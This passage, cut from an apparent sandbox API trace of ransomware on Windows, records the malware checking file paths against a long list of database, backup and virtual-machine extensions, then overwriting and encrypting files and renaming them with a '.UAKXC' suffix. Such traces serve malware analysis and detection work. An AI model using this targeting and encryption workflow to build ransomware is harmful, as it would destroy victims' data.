Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.174] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.175] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.176] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vis") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.177] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.178] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.179] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.179] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.179] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.179] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.179] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.224] WriteFile (in: hFile=0x6c4, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.224] SetEndOfFile (hFile=0x6c4) returned 1 [0141.245] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.245] ReadFile (in: hFile=0x6c4, lpBuffer=0x5030000, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x152, lpOverlapped=0x0) returned 1 [0141.245] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.245] WriteFile (in: hFile=0x6c4, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x152, lpOverlapped=0x0) returned 1 [0141.246] CloseHandle (hObject=0x6c4) returned 1 [0141.247] GetProcessHeap () returned 0xea0000 [0141.247] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.247] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" [0141.247] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.UAKXC" [0141.247] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.uakxc")) returned 1 [0141.248] GetProcessHeap () returned 0xea0000 [0141.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeefe0 | out: hHeap=0xea0000) returned 1 [0141.248] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef26a0 | out: hHeap=0xea0000) returned 1 [0141.248] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0141.248] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0141.248] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0141.249] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn")) returned 0x2022 [0141.250] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.250] GetLastError () returned 0x0 [0141.250] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=392) returned 1 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.250] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.251] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.252] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.253] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", 